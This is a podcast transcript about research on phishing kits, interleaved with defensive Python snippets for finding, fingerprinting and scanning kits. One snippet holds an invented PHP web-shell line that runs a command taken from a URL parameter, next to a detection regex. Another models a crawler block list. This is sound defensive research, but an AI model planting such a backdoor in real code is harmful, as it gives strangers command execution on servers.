CyberWire Daily - Exploring Phishing Kits with Duo Security's Jordan Wright. [Research Saturday]

Starting point is 00:00:00 You're listening to the Cyber Wire Network, powered by N2K. Hello, everyone, and welcome to the CyberWire's Research Saturday. I'm Dave Bittner, and this is our weekly conversation with researchers and analysts tracking down threats and vulnerabilities and solving some of the hard problems of

Starting point is 00:01:10 protecting ourselves in a rapidly evolving cyberspace. Thanks for joining us.

Starting point is 00:02:16 So I have quite a bit of a background in terms of phishing.

Starting point is 00:02:47 It's always been a hobby of mine and an area of interest. Jordan Wright is a senior research and development engineer at Duo Security. He's the author of the research report, Phish in a Barrel. My first exposure to phishing kits was a couple of years ago, when I was doing some high-level independent research around phishing in general, and I came across a phishing kit almost by accident. I found the kit, downloaded it, analyzed it, and realized maybe this is something that could be looked at at scale. You know, if we did this for thousands of phishing URLs, not just a one-off kind of approach.

Starting point is 00:03:27 But as time went on, you know, it always was kind of put on the back burner in terms of projects. And when I was looking at areas to investigate for Duo, this came up and really just struck an area of interest. I knew this was something that I wanted to look at. We had the resources and time to look at it, which resulted in this project. So before we dig into the actual research, can you give us a sense for the landscape? I mean, what is the state of phishing these days? Sure. Phishing is absolutely on the

Starting point is 00:03:57 rise. There were reports given out quarterly last year, during 2016. There's an organization called the Anti-Phishing Working Group, and they consist of multiple organizations who all come together to share research, share data, and to try to combat phishing as a whole. And so they release quarterly reports that indicate the state of phishing and how often phishing sites are being seen. And what we found in 2016 is that, for the number of unique phishing sites seen in a given quarter, we broke the record. And we broke that record twice in 2016, first in Q1 and then in Q2. To give you an idea of the kind of scale that we're talking about, in Q2, there were over 460,000 unique phishing sites seen just in that quarter. To kind of break that down into a different number, that's over 5,000 unique phishing sites seen per day. It's clear that we need to start thinking in terms of at-scale approaches to mitigate phishing.
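As a quick sanity check on the per-day figure quoted above, the arithmetic can be reproduced in a few lines. The 91-day quarter length is an assumption (April through June); the 460,000 figure is the rounded number from the conversation.

```python
# Back-of-the-envelope check of the per-day figure quoted above.
sites_in_quarter = 460_000  # "over 460,000" unique phishing sites in Q2 2016
days_in_quarter = 91        # assumption: April through June has 91 days

sites_per_day = sites_in_quarter / days_in_quarter
print(f"about {sites_per_day:,.0f} unique phishing sites per day")
```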

Starting point is 00:04:58 We need to analyze this as a bigger problem than just trying to hit one-off phishing sites and try to keep up and play whack-a-mole every day. So these numbers are not only growing, but they're growing to a level where we're having to start taking different approaches. Take us through how a typical phishing kit works. To give a bit of background on why phishing kits are even important at all, we have to remember this is a business. For attackers, like any business person, their goal is to maximize the return on investment. And so the entire idea around phishing kits is how can I make my phishing campaigns as efficient and cheap as possible? Because if I can do that and I can start harvesting credentials, then my return on investment is higher. And so what they'll do is they'll start by figuring out what site do I want to spoof. Let's say it's Facebook or Office

Starting point is 00:05:50 365 or Gmail, you name it. They'll figure out the site that they want to clone. They'll download local copies of all that site's resources. This includes the HTML, the images, the style sheets, everything that they need to host a local copy of that website. And then they'll change the login form to point to a script that they control. Typically, this is a short PHP script that does nothing more than collect those credentials. And, almost ironically, it emails them to the attacker saying, I received these credentials from this phishing campaign. After an attacker has all these resources and this script, they'll bundle these up together

Starting point is 00:06:30 into a zip file, and then they'll figure out where do I want to host my next phishing campaign. But this zip file is the phishing kit. This has everything they need to run the campaign. So they'll look out and they'll find, let's say, typically a compromised CMS instance, like a WordPress instance, and they'll exploit an out-of-date plugin or an out-of-date theme to get access to upload their phishing kit onto that server. So they'll upload the zip file, they'll extract the files, and then they have a working phishing site on this hacked website. From there, they'll send out emails pointing to their new website, and they're off to the races. Now, the hacked website that they load their files onto, would the person running that site even be aware that this phishing kit might be living on their site? It really depends. It depends a lot on the monitoring that they have enabled. Traditionally,

Starting point is 00:07:25 what would likely happen is after phishing campaigns and after phishing emails are starting to be sent out, the abuse reports would start rolling in. Security companies would start detecting these sites and trying to shut them down. They'll send notices to the registrar, who in turn will let the person running and operating that website know so that they can try to go and clean up those efforts. And the people who've fallen victim to this, they might not even know that they've given up their credentials. You're absolutely right. And this is where phishing kits can be really sneaky.

Starting point is 00:08:03 So after I've put in my credentials, the last trick up a phishing kit's sleeve is that it's going to redirect me to the legitimate website. Because at this point, it has my credentials. It doesn't need anything else. And so by redirecting me to the legitimate login form, as a user, I just feel, I guess I put in my credentials wrong. I guess I must have done something different or the site didn't work. There was an error. But either way, now if I look up in the address bar or the URL bar,

Starting point is 00:08:25 I see the legitimate website. I don't think anything happened. So there's not even any sense that something's gone wrong and I have a good feeling I've gotten where I wanted to go. And meanwhile, my credentials have been sent off to the bad folks. Exactly. You know, this catches people just trying to live their daily lives, trying to do daily business. And so they would just chalk this up to say, I guess something went wrong. I'll log in again and move forward. So let's go through, how did you start tracking down these phishing kits? So it all starts with knowing what to look for. And this came from my previous research into this

Starting point is 00:08:59 individual phishing kit, which is knowing some different tricks and kind of relying on attackers being lazy and leaving these kits behind. Because that's really the whole reason this research was possible, is that whenever these files are extracted, they don't always delete the original zip file. And that's what we're targeting. If we can download that zip file, we can analyze the code inside of it, including the email address that these credentials are being sent to, as well as what information is being collected. And so we started by trying to figure out what are the best ways that we can track down this zip file. And there are two ways that we came across. The first is looking for what we call directory

Starting point is 00:09:42 indexes or directory listings. In web servers, it's commonly the case that they'll say, if you request a URL that ends with a slash, so indicating a folder, I would know what page to serve you. Say that's index.html or index.php, because I'm presuming that that file is going to be present in every folder. If it's not, which is commonly the case with these phishing kits, web servers can fall back and say, I'm just going to give you a listing of all of the contents in the directory. This includes all the file names that I have in this folder.
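The directory-listing check described here could be sketched roughly as follows. This is a minimal illustration, not the code used in the research: the "Index of" title check is an assumption about how Apache-style auto-index pages usually look, and the sample HTML and the names `LinkCollector`, `looks_like_directory_listing`, and `zip_files_in_listing` are made up for the example.

```python
from html.parser import HTMLParser


class LinkCollector(HTMLParser):
    """Collects the href value of every <a> tag in an HTML page."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def looks_like_directory_listing(html):
    # Assumption: auto-generated index pages carry a title starting "Index of".
    return "<title>Index of" in html


def zip_files_in_listing(html):
    """Returns the links in the listing that point at .zip files."""
    parser = LinkCollector()
    parser.feed(html)
    return [href for href in parser.hrefs if href.lower().endswith(".zip")]


# Hypothetical listing page for a folder that still contains the kit archive.
sample = """<html><head><title>Index of /office365</title></head><body>
<a href="../">Parent Directory</a>
<a href="index_files/">index_files/</a>
<a href="login.php">login.php</a>
<a href="office365phishing.zip">office365phishing.zip</a>
</body></html>"""

if looks_like_directory_listing(sample):
    print(zip_files_in_listing(sample))
```

Any zip file that shows up in such a listing is a candidate phishing kit, whatever its name.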

Starting point is 00:10:22 One of these file names would be the zip file. So that makes it really clear and easy for us to say there's a phishing kit, even if it's not the same name as the extracted contents. You know, let's say they called their phishing kit office365phishing.zip and the folder is just in the URL, you would just see office365. That's a really quick way for us to for sure get phishing kits if they're left on the server. But directory indexing and directory listing is configurable, and it's not always available. In our research, we found that it was available about 23% of the time. So it's a good amount, but it's not 100% reliable. And so we had to look at another method, which is, again, relying on

Starting point is 00:11:07 attackers being lazy in naming the zip file the same name as the extracted folder. So if they named their zip file Office365.zip, and then they unzip those files into Office365, the folder, all we have to do is just work our way up the URL, replacing every slash with .zip. And then if that phishing kit is there, we can download it. And so you gathered up quite a number of URLs. Take us through that part. We did. So we sourced our URLs from two different places. These are both community-driven feeds where anyone can go and submit a phishing URL to these feeds, which then in turn work with different security companies

Starting point is 00:11:50 to try to shut them down. The first is called PhishTank, and they're run by OpenDNS. And the second is called OpenPhish. So we took both of these feeds and we watched them for a month. And over the course of a month, we analyzed

Starting point is 00:12:05 over 66,000 phishing, or possibly phishing, URLs. I say possibly because anyone can upload any URL they want. So it's not a guarantee that all of these are phishing, but a majority of the time they are. So after we analyzed all 66,000 of these URLs, we downloaded over 3,200 unique phishing kits. What's some of the data that you were able to gather from all of those unique phishing kits? That was the next step. We have this huge corpus of data and we need to figure out what does it mean? What's the significance? What can we learn from it? And this is where we started digging in. The first interesting thing that we found was that attackers are pretty good at evading, or at least are trying to evade, detection from security companies. The way this works is that it's a cat and mouse game. Attackers will stand

Starting point is 00:12:57 up a new phishing site, they'll send out emails, and they know that security companies are always looking to locate their phishing site and to shut it down. And so it's to their advantage, remember, this is all return on investment for them, to try to keep their phishing site available and up as long as possible. So there's a couple of things that they'll do to try to keep that level of persistence. The first is that they'll use a file called an .htaccess file. This is something that is specific to the Apache web server, and it's a file that lets administrators tell Apache,

Starting point is 00:13:33 here are the connections that I want you to allow or deny. And you can do this based on any number of interesting attributes, like the user agent or the IP address or the domain that they're claiming to come from. And so attackers will use these .htaccess files to put in the information about security companies. They'll say, I want you to deny connections from these IP addresses, which are known to belong to this security company, or I want you to deny connections from this user agent,

Starting point is 00:14:06 which is known to be a crawler from this other company. And by doing this, they can try to hide a little bit. They can try to evade this detection, where if a company is going and looking for these websites, if they're using the infrastructure that this .htaccess file is designed to block, they wouldn't see the site. It would be kind of hidden from view. This was really common.
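To make the effect of those deny rules concrete, here is a toy model in Python of the decision such rules encode. It is not Apache configuration syntax and not taken from any real kit: the blocked network is a reserved documentation range, and `examplebot` is a made-up crawler name, both assumptions for illustration.

```python
import ipaddress

# Hypothetical block list of the kind a kit's access rules might carry.
BLOCKED_NETWORKS = [ipaddress.ip_network("198.51.100.0/24")]  # documentation range
BLOCKED_AGENT_SUBSTRINGS = ["examplebot"]                     # made-up crawler name


def is_denied(client_ip, user_agent):
    """Returns True if a request would be turned away by the block list."""
    address = ipaddress.ip_address(client_ip)
    if any(address in network for network in BLOCKED_NETWORKS):
        return True
    agent = user_agent.lower()
    return any(fragment in agent for fragment in BLOCKED_AGENT_SUBSTRINGS)


print(is_denied("198.51.100.7", "Mozilla/5.0"))    # request from a blocked network
print(is_denied("203.0.113.9", "ExampleBot/1.0"))  # request from a blocked crawler
print(is_denied("203.0.113.9", "Mozilla/5.0"))     # ordinary visitor
```

A scanner running from the blocked range or identifying itself with the blocked user agent never sees the phishing page, while an ordinary victim does.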

Starting point is 00:14:29 This was really prevalent in all the kits that we found. And we found over 185 different unique .htaccess files. So this shows that there's definitely a level of information sharing between attackers. They'll kind of piecemeal different, you know, one piece of IP addresses from this file that I found, some user agents from this one, and they'll kind of mix and match, but they're all doing the same thing. And this is the same technique and the same idea that they'll use in a different way. So another evasion technique that they'll use

Starting point is 00:15:05 is creating PHP scripts, which do basically the same thing that the .htaccess files do. And they're designed to block connections based on any number of HTTP request attributes. Again, the user agent, IP address, you name it. But this is where things kind of got interesting. As we're looking through these PHP scripts to try to see what it is that they're trying to block or allow, we came across something really interesting, which is that we found multiple PHP scripts that had a hidden backdoor. This backdoor allows anyone, if you know what parameter to put on the end of the URL, to execute whatever system command you want.
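A rough heuristic for spotting this kind of backdoor in a kit's PHP files might look like the sketch below. The pattern (a command-execution function called directly on a request parameter) is an assumption about what such a backdoor commonly looks like, not the specific string from the report, and the sample PHP is invented. A real backdoor may well be obfuscated and slip past a check this simple.

```python
import re

# Assumption: flag PHP lines where a command-execution function is applied
# to user-controlled request data. This is a heuristic, not a full parser.
SUSPICIOUS = re.compile(
    r"\b(?:system|exec|shell_exec|passthru|popen|eval)\s*\(\s*[^;]*"
    r"\$_(?:GET|POST|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)


def find_suspicious_lines(php_source):
    """Returns (line_number, line) pairs that match the heuristic."""
    return [
        (number, line.strip())
        for number, line in enumerate(php_source.splitlines(), start=1)
        if SUSPICIOUS.search(line)
    ]


# Invented example of a "blocker" script with a hidden command parameter.
sample = """<?php
$ua = $_SERVER['HTTP_USER_AGENT'];
if (isset($_GET['cmd'])) { system($_GET['cmd']); }
?>"""

for number, line in find_suspicious_lines(sample):
    print(number, line)
```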

Starting point is 00:15:47 So this kind of falls back on phishing being an economy. In addition to attackers standing up their own campaigns, there's an entire economy around sharing, selling, trading phishing kits between one another. So one attacker may create a phishing kit and then trade or hand it off to any number of other attackers for use in their own campaigns. But it seems like some enterprising attackers, maybe people who wanted to get a little bit of access without really putting in the work, decided to put these hidden backdoors into these files as a way to kind of maintain that persistence, as a way to maintain that control

Starting point is 00:16:25 and still have access to servers or hosts that they didn't take any part in compromising in the first place. These backdoors, we kind of expected to see a couple of them from previous work that had looked at similar situations in the past. But what really surprised us was the scale of the backdoors that we came across. The particular backdoor that you'll find in our report, that unique string was seen over 200 times, indicating this is surprisingly common. You know, these kits are being traded and used very frequently, but many of them are backdoored, so anyone, including other attackers or security researchers or really anyone who would like to access these hosts, can do so through these backdoors very, very easily.

Starting point is 00:17:19 Do you think with that many backdoors being out there that it's a matter of, I don't know, almost a cost of doing business for the folks who are putting these out there? That, you know, the stuff still works for them, but in exchange these backdoors allow other people to take advantage of the work they've done? That's a really good insight. That's absolutely possible. You know, we have to remember that this is all about quantity, not quality. Attackers know that their phishing sites will be shut down relatively quickly. There are a lot of people looking for these, and they're doing a very good job of finding and shutting down these phishing sites. And so it may be the case that

Starting point is 00:17:56 attackers realize the trade-off of analyzing every file in their kit for any kind of backdoor. Like you said, it may just not be worth it. It may be a cost of doing business. They may just say, I'm here to get my credentials as quickly as possible, and then I'm out. I'm going to go somewhere else. You also discovered a lot of reuse with these kits. Yes. After we analyzed the contents of the kits themselves, we wanted to figure out, what does the landscape look like for these phishing kits? Where are they being used? We looked at two sets of problems. The first is, can we identify unique phishing kits that are used in more than one place? Because this would

Starting point is 00:18:36 indicate the same attacker running multiple campaigns and compromising multiple hosts. And we did. We found that in our month span, most of the phishing kits that we came across were seen once. But 27% of the phishing kits that we found, about 900 of them, were seen in more than one place. In fact, a couple of the phishing kits that we've seen were found on more than 30 unique hosts, indicating that attackers had compromised 30 different web servers and ran 30 different campaigns all in the course of a month, which is pretty active. These are very active attackers,

Starting point is 00:19:17 constantly running new campaigns. And so being able to track this reuse gives really valuable insight to security researchers, because they can start tracking actors in different places using very simple techniques that we show in the paper. The second problem, the second area that we wanted to map, and this is another area where it gets really interesting, is can we track attackers across different phishing kits. So the way that we decided a phishing kit is unique is that we took a hash of it, which means we reduce it down to a short set of characters that acts as a unique identifier across our data set. So this means all of the

Starting point is 00:20:00 content in that kit, including the email address of the attacker where credentials are being sent, is bundled into that hash. So if that email address or any other content changes, that hash will be different. And so we took all these hashes, and then we also took it another step further, and we extracted every email address we saw in the kits. And then we mapped all those out, which email addresses are found in which hashes, which unique phishing kits. And that's the map that people will find on, I think it's page 12, where we talk about tracking actors across kits. And here's where it gets even more interesting.
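The hashing and email-mapping step described above could be sketched like this. It is an illustration under stated assumptions rather than the project's actual code: the conversation does not say which hash function was used, so SHA-256 is assumed, the email regular expression is a simple approximation, and the helper `make_kit` plus all addresses exist only to build demo data in memory.

```python
import hashlib
import io
import re
import zipfile
from collections import defaultdict

# Simple approximation of an email address; an assumption, not a full RFC parser.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def kit_hash(zip_bytes):
    """Fingerprints a kit by hashing the raw archive (SHA-256 is an assumption)."""
    return hashlib.sha256(zip_bytes).hexdigest()


def emails_in_kit(zip_bytes):
    """Extracts every email address found in any file inside the archive."""
    found = set()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for name in archive.namelist():
            text = archive.read(name).decode("utf-8", errors="ignore")
            found.update(match.lower() for match in EMAIL_RE.findall(text))
    return found


def map_emails_to_kits(kits):
    """Builds a mapping from email address to the set of kit hashes containing it."""
    mapping = defaultdict(set)
    for zip_bytes in kits:
        digest = kit_hash(zip_bytes)
        for email in emails_in_kit(zip_bytes):
            mapping[email].add(digest)
    return mapping


def make_kit(files):
    """Demo helper (hypothetical): builds a small zip archive in memory."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        for name, content in files.items():
            archive.writestr(name, content)
    return buffer.getvalue()


kit_a = make_kit({"post.php": "<?php mail('drop1@example.com', $s, $m, 'From: maker@example.org'); ?>"})
kit_b = make_kit({"send.php": "<?php mail('drop2@example.com', $s, $m, 'From: maker@example.org'); ?>"})

email_map = map_emails_to_kits([kit_a, kit_b])
for email, hashes in sorted(email_map.items()):
    print(email, len(hashes))
```

In this made-up data the address that appears in both archives is linked to two kit hashes, which is the kind of cross-kit association the map in the report is built from.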

Starting point is 00:20:41 We talk about having an email address for where the credentials are being sent to, but there's another kind of interesting part about it, which is whenever attackers create these phishing kits, they want to leave kind of a signing card. They want to leave a note that says, this person created this phishing kit almost to get credit for it. A typical place that they'll put their email address is as the from address. So whenever you send an email, it has to have a from address.

Starting point is 00:21:11 Well, the email containing the stolen credentials is generally going to be sent from an email address that's the signing card for the person who made the kit. So what this means is that if I create a phishing kit and I put my email address as that signing card, I give it to another attacker. They go and they run multiple campaigns. Both my email address and that attacker's email address will be associated through that phishing kit. So we can take all of these email addresses,

Starting point is 00:21:42 both sender and recipient, and all of these kits and we can map them out. And then we end up with an incredible landscape where we can see here's probably who created all these kits. Here's all the kits that they're associated with. And then here are the people using those kits. And then here are the URLs those are being used at. So you can, at a glance, see the entire ecosystem and the landscape of what phishing attacks are being launched and who's behind them. And so being able to have that view of this ecosystem,

Starting point is 00:22:18 what kind of information were you able to gather from that? One interesting finding that we came across was a single email address was found in more than 115 unique phishing kits. Now, this email address was used, like we talked about, as that signing card, as that from address, which indicates that this actor who created this kit distributed it to any number of people, or they got their hands on it somehow and started using it. But seeing this wide of a scale in such a short time frame shows that the kits created by this alias are very common. And the kits that we found weren't just, it wasn't just one kit for one service.

Starting point is 00:23:01 We found kits with this actor's email address for almost every service provider, Gmail, Office 365, you name it. So it's not just one single attack vector. The people creating these kits are making them for any number of different services before they distribute them. And what else can you learn about the overall ecosystem? Is this a situation where you have a handful of kingpins who are then distributing the software to workers below them who are doing the dirty work, or is it more distributed than that? Is there any sense for that sort of thing? I'd say there's a healthy mix of both distributors, people who make either full

Starting point is 00:23:41 kits themselves or just components of them. Maybe they just make the credential stealing script and then they distribute that and say, you're gonna have to clone your own pages, but you can use this script to send out the emails. And then there's also the side of people who are more DIY in terms of creating their own phishing kits. The barrier to entry in this type of attack is very, very low.

Starting point is 00:24:04 That's why it's so common, because it's easy and cheap to get into, and it still yields incredible results in terms of the effectiveness of phishing in general. So this landscape is still pretty distributed, but it does have that healthy mix where we see both sides of the story. For those who are trying to defend against these sorts of things, these phishing attacks, what advice do you have for them? Absolutely. So this is an area that we're really excited about because we took all the code that we use to run this experiment and we're open sourcing it. We're making it freely available on GitHub for anyone to download it and try to replicate our results for their own organization.

Starting point is 00:24:44 They can put in phishing URLs that they're seeing against their own user base to try to track down the phishing kits behind them. And this gives admins a really good look at what information is being captured, as well as who's behind the attack, where these credentials are being sent. There's also the opportunity to partner up with different mail providers to where we can say, we've come across a phishing kit that's sending credentials to this email address. You may wish to shut this down as an attacker's account. So by having this information, we can start to have a much more full and rich incident response process that lets us take active measures on these phishing attacks as they occur.
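For someone feeding their own phishing URLs into this kind of hunt, the URL trick described earlier in the conversation (working up the path and replacing every slash with .zip) could be sketched as below. This only generates candidate URLs and does not download anything; the function name `candidate_kit_urls` and the example URL are hypothetical, and the released tool may work differently.

```python
from urllib.parse import urlsplit, urlunsplit


def candidate_kit_urls(phishing_url):
    """Lists possible kit archive URLs, deepest folder first.

    Every slash in the path (other than the leading one) is treated as the
    end of a folder name, and ".zip" is appended to the path up to that point.
    """
    parts = urlsplit(phishing_url)
    path = parts.path
    candidates = []
    for index, char in enumerate(path):
        # Skip the leading slash and empty segments from doubled slashes.
        if char == "/" and index > 0 and path[index - 1] != "/":
            zip_path = path[:index] + ".zip"
            candidates.append(
                urlunsplit((parts.scheme, parts.netloc, zip_path, "", ""))
            )
    # Reverse so the list starts at the deepest folder and works up the URL.
    return list(reversed(candidates))


for url in candidate_kit_urls(
    "http://example.com/wp-content/office365/login/index.php?x=1"
):
    print(url)
```

Each candidate would then be requested, and any response that turns out to be a zip archive kept for analysis.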

Starting point is 00:25:27 Is there the possibility of automating the response to these sorts of things? That would be kind of taking this research to the next step, which is now that we have the ability to download this data in bulk and almost in a streaming fashion, could we somehow develop automated measures to respond to the emails that we find, to the phishing URLs that we find? There's a pretty good amount of automation being built in to respond to phishing URLs that are found. So these would be threat feeds that hook into popular products. Or a really good example is Google's Safe Browsing, which is built into the Google Chrome web browser, where as soon as they know about a confirmed phishing site, they'll add that to a global block list where whenever you try to navigate to that website, Chrome will tell you this is a known phishing site.

Starting point is 00:26:18 You may be in a phishing attempt. You may wish to go somewhere else at this point, which is a really effective way to get widespread protection for consumers. And so the type of automation around phishing URLs is pretty strong, but there's a level of automation that we could introduce around what do we do now that we know the attackers behind these campaigns? Can we, you know, kind of like we mentioned earlier, can we work directly with mail providers to send them the stream of email addresses if they don't already have them, indicating that they were known to be found in fraudulent phishing campaigns, where they could shut down those accounts even easier.

Starting point is 00:26:56 And once the account is shut down, any phishing credentials sent to that email address wouldn't be collected and couldn't be used for further fraud. So at Duo Security, you have some tools that help people test their ability to stand up to these phishing attacks. And through that, you all get some interesting statistics. What can you share with us about that? Sure. So we do have a free tool called Duo Insight. And what it does, it allows organizations to test their own exposure to phishing completely free.

Starting point is 00:27:26 So they can set up a campaign with popular phishing pretexts and see how likely it is that their users would open, click, or even submit credentials to fake phishing sites. And so we're always collecting anonymous statistics about how effective our phishing campaigns are. And recent statistics show that over the course of testing about 150,000 recipients, we find that 45% of recipients open the email and 24% of recipients click the link. And at this point, it's important to take a step back and say this could already be game over in some aspects because we hear about browser plug-in vulnerabilities like Flash or Java. If those are out of date, it's easy for attackers to stand up malicious websites, which then compromise those plug-ins and install malware on the system.
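To put the open and click percentages just quoted into absolute terms, a short calculation helps. The recipient count is the rounded "about 150,000" from the conversation, so the results are approximations.

```python
recipients = 150_000  # "about 150,000" recipients, as quoted above

# Integer arithmetic keeps the rounded figures exact.
opened = recipients * 45 // 100   # 45% opened the email
clicked = recipients * 24 // 100  # 24% clicked the link

print(f"opened:  roughly {opened:,}")
print(f"clicked: roughly {clicked:,}")
```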

Starting point is 00:28:20 And so even clicking the link can be pretty disastrous if we're not keeping our software up to date. And taking that a step further, we found that 13% of recipients actually go to the next step and enter their credentials into the fake phishing site. To kind of take that from a different angle, we found that 63% of campaigns were successful in capturing at least one credential. So it shows that we talk about phishing being cheap, and it's getting even more effective with the use of phishing kits, but it's also very effective as a practice. It's very effective as a measure to gain access to sensitive data or gain access to accounts or systems if more than half of your phishing campaigns are going to receive a credential. That's a really good return on investment. It shows why it's so important to really study and try to protect against the phishing landscape. What is your sense as to where we are in terms of facing this threat? Are we

Starting point is 00:29:15 gaining? Are the phishing people doing better than us, or are we doing a better job of shutting them down? I've seen, especially in recent years, there's been multiple companies that have done incredible work at taking on phishing from a wider scale. I mentioned Google Safe Browsing, and that's a perfect example of Google realizing that they can help protect a large user base of anyone who uses Chrome against phishing sites very, very quickly. So we're making really good strides in terms of trying to protect against the increased number of phishing sites that we see, but it's still safe to say that we have room to grow. We have room to continue doing better, to continue studying these attacks and trying

Starting point is 00:29:59 to figure out what protections can we put in place to try to thwart them. But as a whole, you know, security companies and browser makers are doing a good job of trying to combat a threat and take it head on, which is always encouraging to see. Our thanks to Jordan Wright from Duo Security for joining us. You can find the complete report, Phish in a Barrel, in the blog section of the Duo Security website.

Starting point is 00:30:48 The Cyber Wire Research Saturday is proudly produced in Maryland out of the startup studios of Data Tribe, where they're co-building the next generation of cybersecurity teams and technologies. Our amazing Cyber Wire team is Elliot Peltzman, Puru Prakash, Stefan Vaziri, Kelsey Bond,

Starting point is 00:31:29 Tim Nodar, Joe Kerrigan, Carol Terrio, Ben Yellen, Nick Valecki, Gina Johnson, Bennett Moe, Chris Russell, John Petrick, Jennifer Iben, Rick Howard, Peter Kilpie, and I'm Dave Bittner. Thanks for listening.
